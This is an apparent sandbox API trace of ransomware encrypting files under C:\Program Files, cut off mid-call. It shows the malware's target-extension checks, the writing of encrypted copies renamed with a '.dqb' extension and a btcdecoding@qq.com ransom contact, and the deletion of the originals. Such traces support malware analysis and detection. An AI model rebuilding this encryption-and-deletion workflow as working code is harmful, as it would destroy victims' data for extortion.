[0271.730] lstrlenW (lpString=".doc") returned 4 [0271.730] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0271.730] lstrlenW (lpString=".docx") returned 5 [0271.730] lstrcmpiW (lpString1=".docx", lpString2="k.png") returned -1 [0271.730] lstrlenW (lpString=".pdf") returned 4 [0271.731] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0271.731] lstrlenW (lpString=".xls") returned 4 [0271.731] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0271.731] lstrlenW (lpString=".xlsx") returned 5 [0271.731] lstrcmpiW (lpString1=".xlsx", lpString2="k.png") returned -1 [0271.731] lstrlenW (lpString=".ppt") returned 4 [0271.731] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0271.731] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png") returned 65 [0271.731] lstrlenW (lpString=".zip") returned 4 [0271.731] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0271.731] lstrlenW (lpString=".rar") returned 4 [0271.731] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0271.731] lstrlenW (lpString=".bz2") returned 4 [0271.731] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0271.731] lstrlenW (lpString=".7z") returned 3 [0271.731] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0271.731] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png") returned 65 [0271.731] lstrlenW (lpString=".dbf") returned 4 [0271.731] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0271.731] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png") returned 65 [0271.731] lstrlenW (lpString=".1cd") returned 4 [0271.731] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0271.731] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png") returned 65 [0271.731] lstrlenW (lpString=".jpg") returned 4 [0271.731] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0271.731] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png") returned 65 [0271.731] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png") returned 65 [0271.731] lstrlenW (lpString=".doc") returned 4 [0271.731] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0271.731] lstrlenW (lpString=".docx") returned 5 [0271.731] lstrcmpiW (lpString1=".docx", lpString2="k.png") returned -1 [0271.731] lstrlenW (lpString=".pdf") returned 4 [0271.731] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0271.731] lstrlenW (lpString=".xls") returned 4 [0271.732] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0271.732] lstrlenW (lpString=".xlsx") returned 5 [0271.732] lstrcmpiW (lpString1=".xlsx", lpString2="k.png") returned -1 [0271.732] lstrlenW (lpString=".ppt") returned 4 [0271.732] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0271.732] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png") returned 65 [0271.732] lstrlenW (lpString=".zip") returned 4 [0271.732] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0271.732] lstrlenW (lpString=".rar") returned 4 [0271.732] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0271.732] lstrlenW (lpString=".bz2") returned 4 [0271.732] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0271.732] lstrlenW (lpString=".7z") returned 3 [0271.732] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0271.732] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png") returned 65 [0271.732] lstrlenW (lpString=".dbf") returned 4 [0271.732] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0271.732] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png") returned 65 [0271.732] lstrlenW (lpString=".1cd") returned 4 [0271.732] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0271.732] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png") returned 65 [0271.732] lstrlenW (lpString=".jpg") returned 4 [0271.732] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0271.732] lstrcmpiW (lpString1=".png", lpString2=".dqb") returned 1 [0271.732] lstrlenW (lpString="background.png") returned 14 [0271.732] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\background.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0271.733] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x2fcff1c | out: lpFileSize=0x2fcff1c*=52251) returned 1 [0271.733] CloseHandle (hObject=0x320) returned 1 [0271.733] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\background.png")) returned 0x20 [0271.733] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\background.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0271.733] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0271.733] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png") returned 67 [0271.733] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png") returned 67 [0271.733] lstrlenW (lpString=".doc") returned 4 [0271.733] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0271.733] lstrlenW (lpString=".docx") returned 5 [0271.733] lstrcmpiW (lpString1=".docx", lpString2="d.png") returned -1 [0271.733] lstrlenW (lpString=".pdf") returned 4 [0271.733] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0271.733] lstrlenW (lpString=".xls") returned 4 [0271.733] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0271.733] lstrlenW (lpString=".xlsx") returned 5 [0271.733] lstrcmpiW (lpString1=".xlsx", lpString2="d.png") returned -1 [0271.733] lstrlenW (lpString=".ppt") returned 4 [0271.733] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0271.733] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png") returned 67 [0271.733] lstrlenW (lpString=".zip") returned 4 [0271.733] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0271.733] lstrlenW (lpString=".rar") returned 4 [0271.733] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0271.733] lstrlenW (lpString=".bz2") returned 4 [0271.733] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0271.734] lstrlenW (lpString=".7z") returned 3 [0271.734] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0271.734] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png") returned 67 [0271.734] lstrlenW (lpString=".dbf") returned 4 [0271.734] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0272.025] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x2fcff1c | out: lpFileSize=0x2fcff1c*=27964) returned 1 [0272.025] CloseHandle (hObject=0x31c) returned 1 [0272.025] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\highlight.png")) returned 0x20 [0272.027] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\highlight.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.027] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.028] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0272.028] lstrcmpiW (lpString1=".docx", lpString2="t.png") returned -1 [0272.028] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0272.028] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0272.028] lstrcmpiW (lpString1=".xlsx", lpString2="t.png") returned -1 [0272.028] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0272.028] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0272.028] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0272.028] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0272.028] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0272.028] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0272.028] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0272.028] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0272.028] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0272.028] lstrcmpiW (lpString1=".docx", lpString2="t.png") returned -1 [0272.028] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0272.028] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0272.028] lstrcmpiW (lpString1=".xlsx", lpString2="t.png") returned -1 [0272.028] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0272.028] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0272.029] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0272.029] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0272.029] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0272.029] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0272.029] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0272.029] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0272.029] lstrcmpiW (lpString1=".png", lpString2=".dqb") returned 1 [0272.029] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\nextmenubuttonicon.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0272.029] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x2fcff1c | out: lpFileSize=0x2fcff1c*=3808) returned 1 [0272.029] CloseHandle (hObject=0x31c) returned 1 [0272.029] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\nextmenubuttonicon.png")) returned 0x20 [0272.029] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\nextmenubuttonicon.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.029] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\nextmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.030] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0272.030] lstrcmpiW (lpString1=".docx", lpString2="n.png") returned -1 [0272.030] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0272.030] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0272.030] lstrcmpiW (lpString1=".xlsx", lpString2="n.png") returned -1 [0272.030] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0272.030] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0272.030] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0272.030] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0272.030] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0272.030] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0272.030] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0272.030] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0272.030] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0272.030] lstrcmpiW (lpString1=".docx", lpString2="n.png") returned -1 [0272.030] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0272.030] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0272.030] lstrcmpiW (lpString1=".xlsx", lpString2="n.png") returned -1 [0272.030] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0272.030] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0272.030] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0272.030] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0272.031] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0272.031] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0272.031] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0272.031] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0272.031] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x41c21e0, Size=0x4000) returned 0x41c21e0 [0272.031] lstrcmpiW (lpString1=".png", lpString2=".dqb") returned 1 [0272.031] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\parentmenubuttonicon.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0272.207] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x2fcff1c | out: lpFileSize=0x2fcff1c*=3810) returned 1 [0272.207] CloseHandle (hObject=0x31c) returned 1 [0272.207] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\parentmenubuttonicon.png")) returned 0x20 [0272.207] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\parentmenubuttonicon.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.207] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\parentmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.208] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0272.209] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0274.463] SetFilePointerEx (in: hFile=0x1d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fcfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.464] SetFilePointerEx (in: hFile=0x1d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fcfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00184_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0274.579] GetLastError () returned 0x0 [0274.579] ReadFile (in: hFile=0x1d4, lpBuffer=0x3c10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fcfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c10020*, lpNumberOfBytesRead=0x2fcfed4*=0x1b2e, lpOverlapped=0x0) returned 1 [0274.602] WriteFile (in: hFile=0x31c, lpBuffer=0x3c10020*, nNumberOfBytesToWrite=0x1b30, lpNumberOfBytesWritten=0x2fcfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c10020*, lpNumberOfBytesWritten=0x2fcfc9c*=0x1b30, lpOverlapped=0x0) returned 1 [0274.606] ReadFile (in: hFile=0x1d4, lpBuffer=0x3c10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fcfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c10020*, lpNumberOfBytesRead=0x2fcfed4*=0x0, lpOverlapped=0x0) returned 1 [0274.606] WriteFile (in: hFile=0x31c, lpBuffer=0x3c10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fcfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c10020*, lpNumberOfBytesWritten=0x2fcfc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.606] SetEndOfFile (hFile=0x31c) returned 1 [0274.606] CloseHandle (hObject=0x31c) returned 1 [0274.606] SetFilePointerEx (in: hFile=0x1d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fcfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.606] SetEndOfFile (hFile=0x1d4) returned 1 [0274.609] CloseHandle (hObject=0x1d4) returned 1 [0274.609] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0274.666] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00184_.wmf")) returned 1 [0274.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0274.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0274.682] lstrlenW (lpString=".doc") returned 4 [0274.682] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.682] lstrlenW (lpString=".docx") returned 5 [0274.682] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.682] lstrlenW (lpString=".pdf") returned 4 [0274.682] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.682] lstrlenW (lpString=".xls") returned 4 [0274.682] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.682] lstrlenW (lpString=".xlsx") returned 5 [0274.682] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.682] lstrlenW (lpString=".ppt") returned 4 [0274.682] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0274.682] lstrlenW (lpString=".zip") returned 4 [0274.682] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.682] lstrlenW (lpString=".rar") returned 4 [0274.682] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.682] lstrlenW (lpString=".bz2") returned 4 [0274.682] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.682] lstrlenW (lpString=".7z") returned 3 [0274.682] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0274.682] lstrlenW (lpString=".dbf") returned 4 [0274.682] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0274.682] lstrlenW (lpString=".1cd") returned 4 [0274.682] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0274.683] lstrlenW (lpString=".jpg") returned 4 [0274.683] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0274.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0274.683] lstrlenW (lpString=".doc") returned 4 [0274.683] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.683] lstrlenW (lpString=".docx") returned 5 [0274.683] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.683] lstrlenW (lpString=".pdf") returned 4 [0274.683] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.683] lstrlenW (lpString=".xls") returned 4 [0274.683] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.683] lstrlenW (lpString=".xlsx") returned 5 [0274.683] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.683] lstrlenW (lpString=".ppt") returned 4 [0274.683] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0274.683] lstrlenW (lpString=".zip") returned 4 [0274.683] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.683] lstrlenW (lpString=".rar") returned 4 [0274.683] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.683] lstrlenW (lpString=".bz2") returned 4 [0274.683] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.683] lstrlenW (lpString=".7z") returned 3 [0274.683] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0274.683] lstrlenW (lpString=".dbf") returned 4 [0274.683] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.684] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0274.684] lstrlenW (lpString=".1cd") returned 4 [0274.684] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.684] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0274.684] lstrlenW (lpString=".jpg") returned 4 [0274.684] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.684] lstrcmpiW (lpString1=".WMF", lpString2=".dqb") returned 1 [0274.684] lstrlenW (lpString="EN00222_.WMF") returned 12 [0274.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00222_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0274.699] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x2fcff1c | out: lpFileSize=0x2fcff1c*=12356) returned 1 [0274.699] CloseHandle (hObject=0x320) returned 1 [0274.699] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00222_.wmf")) returned 0x20 [0274.743] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00222_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00222_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0274.769] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fcfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.769] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fcfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00222_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0274.777] GetLastError () returned 0x0 [0274.777] ReadFile (in: hFile=0x328, lpBuffer=0x3c10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fcfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c10020*, lpNumberOfBytesRead=0x2fcfed4*=0x3044, lpOverlapped=0x0) returned 1 [0274.779] WriteFile (in: hFile=0x310, lpBuffer=0x3c10020*, nNumberOfBytesToWrite=0x3050, lpNumberOfBytesWritten=0x2fcfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c10020*, lpNumberOfBytesWritten=0x2fcfc9c*=0x3050, lpOverlapped=0x0) returned 1 [0274.780] ReadFile (in: hFile=0x328, lpBuffer=0x3c10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fcfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c10020*, lpNumberOfBytesRead=0x2fcfed4*=0x0, lpOverlapped=0x0) returned 1 [0274.780] WriteFile (in: hFile=0x310, lpBuffer=0x3c10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fcfc9c, lpOverlapped=0x0 | out: 